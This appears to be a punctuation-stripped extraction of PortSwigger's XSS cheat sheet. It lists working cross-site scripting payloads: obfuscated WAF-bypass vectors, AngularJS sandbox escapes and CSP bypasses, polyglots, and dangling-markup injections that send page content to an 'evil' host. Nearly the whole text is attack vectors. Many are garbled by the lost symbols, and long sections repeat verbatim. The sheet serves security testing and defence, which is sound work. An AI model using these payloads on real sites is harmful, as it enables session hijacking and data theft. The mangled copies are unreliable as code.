XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
